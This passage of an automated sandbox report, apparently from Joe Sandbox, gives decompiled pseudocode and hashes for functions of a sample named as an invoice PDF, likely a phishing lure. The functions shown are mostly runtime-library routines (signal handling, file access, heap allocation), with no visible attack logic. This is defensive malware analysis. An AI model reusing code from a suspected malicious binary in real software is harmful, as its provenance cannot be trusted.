                            				int _t31;
                            				intOrPtr* _t32;
                            				void* _t36;
                            				intOrPtr _t38;
                            				signed int* _t40;
                            				int _t41;
                            				void* _t42;
                            				intOrPtr _t55;
                            				signed int _t57;
                            				intOrPtr* _t59;
                            				void* _t61;
                            				void* _t62;
                            
                            				_t54 = __edx;
                            				E01318310(__edx, 0x133a620, 0x18);
                            				_t40 =  *(_t62 + 0xc);
                            				if(_t40 == 4 || _t40 == 3) {
                            					_push( *((intOrPtr*)(_t62 + 8)));
                            					goto L34;
                            				} else {
                            					_t55 =  *((intOrPtr*)(_t62 + 8));
                            					if(_t55 == 2 || _t55 == 0x15 || _t55 == 0x16 || _t55 == 6 || _t55 == 0xf) {
                            						_t41 = 0;
                            						 *((char*)(_t62 - 0x19)) = 0;
                            						 *(_t62 - 0x28) = 0;
                            						 *(_t62 - 0x20) = 0;
                            						E01325FFE(3);
                            						 *((intOrPtr*)(_t62 - 4)) = 0;
                            						if(_t55 == 2 || _t55 == 0x15) {
                            							if( *0x1345e90 == 0) {
                            								_t31 = SetConsoleCtrlHandler(E0131EA12, 1); // executed
                            								if(_t31 == 0) {
                            									_t32 = E0131C9BB();
                            									 *_t32 = GetLastError();
                            									_t41 = 1;
                            									 *((char*)(_t62 - 0x19)) = 1;
                            								} else {
                            									 *0x1345e90 = 1;
                            								}
                            							}
                            						}
                            						_t26 = E0131EAC0(_t55);
                            						 *(_t62 - 0x28) = _t26;
                            						if(_t26 != 0) {
                            							_t57 =  *0x133c008; // 0xa3433343
                            							asm("ror esi, cl");
                            							 *(_t62 - 0x20) = _t57 ^  *_t26;
                            							_t29 =  *(_t62 + 0xc);
                            							if( *(_t62 + 0xc) != 2) {
                            								 *( *(_t62 - 0x28)) = E0131F6AC(_t29);
                            							}
                            						}
                            						 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                            						E0131EF58();
                            						if(_t41 != 0) {
                            							goto L10;
                            						} else {
                            							goto L35;
                            						}
                            					} else {
                            						if(_t55 == 8 || _t55 == 4 || _t55 == 0xb) {
                            							_t59 = E013244A9(_t42);
                            							if(_t59 == 0) {
                            								goto L10;
                            							}
                            							if( *_t59 != 0x1335190) {
                            								L15:
                            								 *((intOrPtr*)(_t62 - 0x24)) =  *_t59;
                            								_t36 = E0131EB02(_t55,  *_t59);
                            								if(_t36 == 0) {
                            									goto L10;
                            								}
                            								_t4 = _t36 + 8; // 0x8
                            								_t54 = _t4;
                            								 *(_t62 - 0x28) =  *_t54;
                            								if(_t40 == 2) {
                            									L21:
                            									goto L35;
                            								}
                            								_t61 =  *0x1335220 * 0xc +  *((intOrPtr*)(_t62 - 0x24));
                            								if(_t36 == _t61) {
                            									goto L21;
                            								}
                            								while( *((intOrPtr*)(_t54 - 4)) == _t55) {
                            									 *_t54 = _t40;
                            									_t54 =  &(_t54[3]);
                            									_t8 = _t54 - 8; // -12
                            									if(_t8 != _t61) {
                            										continue;
                            									}
                            									break;
                            								}
                            								goto L21;
                            							}
                            							_t38 = E01320A25(_t42,  *0x1335224);
                            							 *_t59 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							} else {
                            								E013189A0(_t38, 0x1335190,  *0x1335224);
                            								goto L15;
                            							}
                            						} else {
                            							L10:
                            							_push(_t55);
                            							L34:
                            							E0131EB2A();
                            							L35:
                            							return E01318356(_t54);
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • SetConsoleCtrlHandler.KERNELBASE(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                            • GetLastError.KERNEL32 ref: 0131EEF1
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ConsoleCtrlErrorHandlerLast
                            • String ID:
                            • API String ID: 3113525192-0
                            • Opcode ID: 5e423a2994a1a0e0352fdb575c735f3d4f73d8aad7e1cb9feaa8c1fcc4aa4a6f
                            • Instruction ID: bfc555b1300799d4f1d7580ae18195f6067850595f3154fbb11db63bd75c0074
                            • Opcode Fuzzy Hash: 5e423a2994a1a0e0352fdb575c735f3d4f73d8aad7e1cb9feaa8c1fcc4aa4a6f
                            • Instruction Fuzzy Hash: E841E531E002168BEF3F9F6CC4845ADBBB6AF59318F190039ED49A7258D7339884C765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E0131CA68(WCHAR* _a4, void* _a8) {
                            				void* _v8;
                            				void _v56;
                            				void* __edi;
                            				signed int _t17;
                            				void* _t18;
                            				signed int _t19;
                            				signed int _t20;
                            				intOrPtr* _t25;
                            				signed int _t26;
                            				signed int _t34;
                            				signed int _t36;
                            				void* _t39;
                            				signed int _t42;
                            				signed int _t44;
                            				void* _t45;
                            				WCHAR* _t49;
                            				void* _t56;
                            				intOrPtr _t59;
                            				void* _t60;
                            				void* _t62;
                            
                            				if(_a8 != 0) {
                            					_push(_t45);
                            					_t34 = 0;
                            					E01318520(_t45,  &_v56, 0, 0x30);
                            					_t36 = 0xc;
                            					memcpy(_a8,  &_v56, _t36 << 2);
                            					_t62 = _t60 + 0x18;
                            					_t49 = _a4;
                            					__eflags = _t49;
                            					if(_t49 != 0) {
                            						_t17 = E01325190(_t49, L"?*");
                            						_pop(_t39);
                            						__eflags = _t17;
                            						if(_t17 == 0) {
                            							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
                            							_push(_a8);
                            							_t56 = _t18;
                            							_v8 = _t56;
                            							__eflags = _t56 - 0xffffffff;
                            							if(__eflags == 0) {
                            								_push(_t49);
                            								_t19 = E0131CB6F(_t39, _t44, _t49, __eflags);
                            							} else {
                            								_push(_t56);
                            								_push(0xffffffff);
                            								_push(_t49);
                            								_t19 = E0131CBFB(_t44);
                            								_t62 = _t62 + 0x10;
                            							}
                            							__eflags = _t19;
                            							if(_t19 == 0) {
                            								E01318520(_t49,  &_v56, _t34, 0x30);
                            								_t34 = _t34 | 0xffffffff;
                            								__eflags = _t34;
                            								_t42 = 0xc;
                            								memcpy(_a8,  &_v56, _t42 << 2);
                            								_t56 = _v8;
                            							}
                            							__eflags = _t56 - 0xffffffff;
                            							if(_t56 != 0xffffffff) {
                            								CloseHandle(_t56);
                            							}
                            							_t20 = _t34;
                            							L15:
                            							return _t20;
                            						}
                            						_t25 = E0131C9CE();
                            						_t59 = 2;
                            						 *_t25 = _t59;
                            						_t26 = E0131C9BB();
                            						 *_t26 = _t59;
                            						L6:
                            						_t20 = _t26 | 0xffffffff;
                            						goto L15;
                            					}
                            					 *(E0131C9BB()) = 0;
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					_t26 = E01321788();
                            					goto L6;
                            				}
                            				 *(E0131C9BB()) =  *_t29 & 0x00000000;
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				return E01321788() | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction ID: 4e60c5844f1bc9349a7417f8750659f42c954b4913d449276790f675b670589d
                            • Opcode Fuzzy Hash: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction Fuzzy Hash: 4331FB72880219BAEB297B6CDC41FAE372DEF4273CF105215F9646B1C4DB705D01D6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E013113D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                            				signed int _v4;
                            				void* _v8;
                            				char _v92;
                            				void* _v100;
                            				char _v104;
                            				signed int _t12;
                            				signed int _t14;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr* _t31;
                            				char* _t35;
                            				signed int _t42;
                            				void* _t43;
                            
                            				_t42 =  &_v100;
                            				_t12 =  *0x133c008; // 0xa3433343
                            				_v4 = _t12 ^ _t42;
                            				_t31 = _a4;
                            				_t35 =  &_v92;
                            				_t21 = _a8 + 0xffffffa0;
                            				_t14 = E01319F16(__edx,  *_t31, _t21, 0); // executed
                            				_t43 = _t42 + 0xc;
                            				if(_t14 != 0) {
                            					L5:
                            					E0131786A();
                            					return _t14 | 0xffffffff;
                            				} else {
                            					_t14 = E01319B2B( &_v100, 0x60, 1,  *_t31); // executed
                            					_t43 = _t43 + 0x10;
                            					if(_t14 < 1) {
                            						goto L5;
                            					} else {
                            						while(1) {
                            							_t17 = E01319780(0x1330340, _t35, 8);
                            							_t43 = _t43 + 0xc;
                            							if(_t17 == 0) {
                            								break;
                            							}
                            							_t35 = _t35 - 1;
                            							_t14 =  &_v100;
                            							if(_t35 >= _t14) {
                            								continue;
                            							} else {
                            								goto L5;
                            							}
                            							goto L7;
                            						}
                            						asm("movups xmm0, [esi]");
                            						asm("movups [edi+0x10], xmm0");
                            						asm("movups xmm0, [esi+0x10]");
                            						asm("movups [edi+0x20], xmm0");
                            						asm("movups xmm0, [esi+0x20]");
                            						asm("movups [edi+0x30], xmm0");
                            						asm("movups xmm0, [esi+0x30]");
                            						asm("movups [edi+0x40], xmm0");
                            						asm("movups xmm0, [esi+0x40]");
                            						asm("movups [edi+0x50], xmm0");
                            						asm("movq xmm0, [esi+0x50]");
                            						asm("movq [edi+0x60], xmm0");
                            						_push( *((intOrPtr*)(_t31 + 0x18)));
                            						L01317864();
                            						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
                            						E0131786A();
                            						return 0;
                            					}
                            				}
                            				L7:
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction ID: 556056ec954d51a1965f5073cb3e38887b137cc2307528d74eb4faed9977456f
                            • Opcode Fuzzy Hash: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction Fuzzy Hash: CF212632E04B42A7D3249B3CCC016A6F3A0FFA8218F849B19FE9862545FB21F5D4C381
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E01319FC9(signed int __edx, intOrPtr* _a4) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t64;
                            				signed int _t66;
                            				signed char _t68;
                            				signed int _t70;
                            				signed char _t77;
                            				intOrPtr* _t78;
                            				signed int _t79;
                            				signed char _t80;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				signed int _t90;
                            				intOrPtr _t93;
                            				signed int _t94;
                            				intOrPtr* _t95;
                            				signed char _t96;
                            				signed int _t99;
                            				signed int _t100;
                            				signed int _t103;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t113;
                            				signed int _t114;
                            				signed int _t115;
                            				signed int _t118;
                            				signed int _t120;
                            
                            				_t104 = __edx;
                            				if(_a4 != 0) {
                            					_t64 = E013209C5(_a4);
                            					_t93 = _a4;
                            					_t118 = _t64;
                            					__eflags =  *(_t93 + 8);
                            					if( *(_t93 + 8) < 0) {
                            						 *(_t93 + 8) = 0;
                            					}
                            					_t66 = E013227EC(_t118, 0, 0, 1); // executed
                            					_t90 = _t104;
                            					_t109 = _t66;
                            					_v12 = _t109;
                            					__eflags = _t90;
                            					if(__eflags > 0) {
                            						L7:
                            						_t68 =  *(_a4 + 0xc);
                            						__eflags = _t68 & 0x000000c0;
                            						if((_t68 & 0x000000c0) != 0) {
                            							_t70 = _t118 >> 6;
                            							_t94 = (_t118 & 0x0000003f) * 0x30;
                            							_v16 = _t70;
                            							_v20 = _t94;
                            							_t95 = _a4;
                            							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x1346108 + _t70 * 4)) + 0x29));
                            							_t96 =  *(_t95 + 0xc);
                            							asm("cdq");
                            							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                            							__eflags = _t96 & 0x00000003;
                            							if((_t96 & 0x00000003) == 0) {
                            								_t77 =  *(_a4 + 0xc) >> 2;
                            								__eflags = _t77 & 0x00000001;
                            								if((_t77 & 0x00000001) != 0) {
                            									L23:
                            									_t78 = _a4;
                            									L24:
                            									__eflags = _t109 | _t90;
                            									if((_t109 | _t90) == 0) {
                            										L30:
                            										_t79 = _t120;
                            										goto L31;
                            									}
                            									_t80 =  *(_t78 + 0xc);
                            									__eflags = _t80 & 0x00000001;
                            									if((_t80 & 0x00000001) == 0) {
                            										__eflags = _v5 - 1;
                            										if(_v5 == 1) {
                            											_t120 = E01317AE0(_t120, _t104, 2, 0);
                            										}
                            										_t120 = _t120 + _t109;
                            										asm("adc edx, ebx");
                            										goto L30;
                            									}
                            									_t79 = E0131A15E(_a4, _t109, _t90, _t120, _t104);
                            									goto L31;
                            								}
                            								_t66 = E0131C9CE();
                            								 *_t66 = 0x16;
                            								goto L22;
                            							}
                            							__eflags = _v5 - 1;
                            							_t99 = _v16;
                            							if(_v5 != 1) {
                            								L13:
                            								_t82 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
                            								_t100 = _v20;
                            								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                            								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                            									goto L23;
                            								}
                            								_t78 = _a4;
                            								_v20 = _v20 & 0x00000000;
                            								_t111 =  *(_t78 + 4);
                            								__eflags =  *_t78 - _t111;
                            								asm("sbb edi, edi");
                            								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                            								__eflags = _t113;
                            								_v16 = _t113;
                            								_t109 = _v12;
                            								if(_t113 == 0) {
                            									goto L24;
                            								}
                            								_t103 =  *(_t78 + 4);
                            								_t114 = _v20;
                            								do {
                            									__eflags =  *_t103 - 0xa;
                            									if( *_t103 == 0xa) {
                            										_t120 = _t120 + 1;
                            										asm("adc edx, 0x0");
                            									}
                            									_t103 = _t103 + 1;
                            									_t114 = _t114 + 1;
                            									__eflags = _t114 - _v16;
                            								} while (_t114 != _v16);
                            								_t109 = _v12;
                            								goto L24;
                            							}
                            							_t115 = _v20;
                            							_t83 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
                            							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                            							_t109 = _v12;
                            							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                            								goto L13;
                            							}
                            							_t79 = E0131A2E2(_a4, _t109, _t90);
                            							goto L31;
                            						}
                            						asm("cdq");
                            						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                            						asm("sbb ebx, edx");
                            						goto L31;
                            					} else {
                            						if(__eflags < 0) {
                            							L22:
                            							_t79 = _t66 | 0xffffffff;
                            							L31:
                            							return _t79;
                            						}
                            						__eflags = _t109;
                            						if(_t109 < 0) {
                            							goto L22;
                            						}
                            						goto L7;
                            					}
                            				}
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				return E01321788() | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01325E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				char _v8;
                            				char _v12;
                            				void* _v16;
                            				intOrPtr _v20;
                            				char _v32;
                            				void* _t25;
                            
                            				E01325BBD( &_v32, _a8);
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				if(_v12 != 0) {
                            					_t25 = E0132C048( &_v8, _a4, _v20, _a12, 0x180); // executed
                            					if(_t25 != 0) {
                            						goto L1;
                            					}
                            					 *0x1345e8c =  *0x1345e8c + 1;
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_a16 + 8)) = 0;
                            					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                            					 *((intOrPtr*)(_a16 + 4)) = 0;
                            					 *_a16 = 0;
                            					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                            					return _a16;
                            				}
                            				L1:
                            				return 0;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E0131E562(void* __esi, void* __eflags) {
                            				intOrPtr _v12;
                            				void* __ecx;
                            				char _t16;
                            				void* _t17;
                            				void* _t26;
                            				void* _t28;
                            				void* _t30;
                            				char _t31;
                            				void* _t33;
                            				intOrPtr* _t35;
                            
                            				_push(_t26);
                            				_push(_t26);
                            				_t16 = E01320B10(_t26, 0x40, 0x30); // executed
                            				_t31 = _t16;
                            				_v12 = _t31;
                            				_t28 = _t30;
                            				if(_t31 != 0) {
                            					_t2 = _t31 + 0xc00; // 0xc00
                            					_t17 = _t2;
                            					__eflags = _t31 - _t17;
                            					if(__eflags != 0) {
                            						_t3 = _t31 + 0x20; // 0x20
                            						_t35 = _t3;
                            						_t33 = _t17;
                            						do {
                            							_t4 = _t35 - 0x20; // 0x0
                            							E0132391E(_t28, __eflags, _t4, 0xfa0, 0);
                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                            							 *_t35 = 0;
                            							_t35 = _t35 + 0x30;
                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                            							 *((char*)(_t35 - 0x24)) = 0xa;
                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                            							 *((char*)(_t35 - 0x22)) = 0;
                            							__eflags = _t35 - 0x20 - _t33;
                            						} while (__eflags != 0);
                            						_t31 = _v12;
                            					}
                            				} else {
                            					_t31 = 0;
                            				}
                            				E013209EB(0);
                            				return _t31;
                            			}

                            APIs
                              • Part of subcall function 01320B10: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            • _free.LIBCMT ref: 0131E5CE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E01319813(void* __ecx, intOrPtr _a4) {
                            				signed int _t13;
                            				void* _t16;
                            				void* _t24;
                            				signed int _t25;
                            				signed int _t26;
                            				intOrPtr _t28;
                            
                            				_t28 = _a4;
                            				if(_t28 == 0) {
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					return E01321788() | 0xffffffff;
                            				}
                            				_push(_t25);
                            				_t26 = _t25 | 0xffffffff;
                            				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                            					_t13 = E0131DA31(_t24, _t28); // executed
                            					_t26 = _t13; // executed
                            					E01321AED(_t28); // executed
                            					_t16 = E01321875(E013209C5(_t28)); // executed
                            					if(_t16 >= 0) {
                            						if( *(_t28 + 0x1c) != 0) {
                            							E013209EB( *(_t28 + 0x1c));
                            							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
                            						}
                            					} else {
                            						_t26 = _t26 | 0xffffffff;
                            					}
                            				}
                            				E013219EF(_t28);
                            				return _t26;
                            			}

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E01320B10(void* __ecx, signed int _a4, signed int _a8) {
                            				void* _t8;
                            				void* _t12;
                            				signed int _t13;
                            				void* _t15;
                            				signed int _t18;
                            				long _t19;
                            
                            				_t15 = __ecx;
                            				_t18 = _a4;
                            				if(_t18 == 0) {
                            					L2:
                            					_t19 = _t18 * _a8;
                            					if(_t19 == 0) {
                            						_t19 = _t19 + 1;
                            					}
                            					while(1) {
                            						_t8 = RtlAllocateHeap( *0x134655c, 8, _t19); // executed
                            						if(_t8 != 0) {
                            							break;
                            						}
                            						__eflags = E01320397();
                            						if(__eflags == 0) {
                            							L8:
                            							 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            							__eflags = 0;
                            							return 0;
                            						}
                            						_t12 = E01328686(_t15, __eflags, _t19);
                            						_pop(_t15);
                            						__eflags = _t12;
                            						if(_t12 == 0) {
                            							goto L8;
                            						}
                            					}
                            					return _t8;
                            				}
                            				_t13 = 0xffffffe0;
                            				if(_t13 / _t18 < _a8) {
                            					goto L8;
                            				}
                            				goto L2;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01328DC7(void* __ecx, void* __eflags, intOrPtr* _a4) {
                            				intOrPtr _t12;
                            				intOrPtr _t16;
                            				intOrPtr* _t26;
                            
                            				 *0x1345e8c =  *0x1345e8c + 1;
                            				_t26 = _a4;
                            				_t12 = E01320A25(__ecx, 0x1000); // executed
                            				 *((intOrPtr*)(_t26 + 4)) = _t12;
                            				E013209EB(0);
                            				if( *((intOrPtr*)(_t26 + 4)) == 0) {
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_t26 + 0x18)) = 2;
                            					 *((intOrPtr*)(_t26 + 4)) = _t26 + 0x14;
                            				} else {
                            					_push(0x40);
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_t26 + 0x18)) = 0x1000;
                            				}
                            				_t16 =  *((intOrPtr*)(_t26 + 4));
                            				 *(_t26 + 8) =  *(_t26 + 8) & 0x00000000;
                            				 *_t26 = _t16;
                            				return _t16;
                            			}

                            APIs
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • _free.LIBCMT ref: 01328DE7
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLast_free
                            • String ID:
                            • API String ID: 314386986-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E01320A25(void* __ecx, long _a4) {
                            				void* _t4;
                            				void* _t6;
                            				void* _t7;
                            				long _t8;
                            
                            				_t7 = __ecx;
                            				_t8 = _a4;
                            				if(_t8 > 0xffffffe0) {
                            					L7:
                            					 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            					__eflags = 0;
                            					return 0;
                            				}
                            				if(_t8 == 0) {
                            					_t8 = _t8 + 1;
                            				}
                            				while(1) {
                            					_t4 = RtlAllocateHeap( *0x134655c, 0, _t8); // executed
                            					if(_t4 != 0) {
                            						break;
                            					}
                            					__eflags = E01320397();
                            					if(__eflags == 0) {
                            						goto L7;
                            					}
                            					_t6 = E01328686(_t7, __eflags, _t8);
                            					_pop(_t7);
                            					__eflags = _t6;
                            					if(_t6 == 0) {
                            						goto L7;
                            					}
                            				}
                            				return _t4;
                            			}








                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
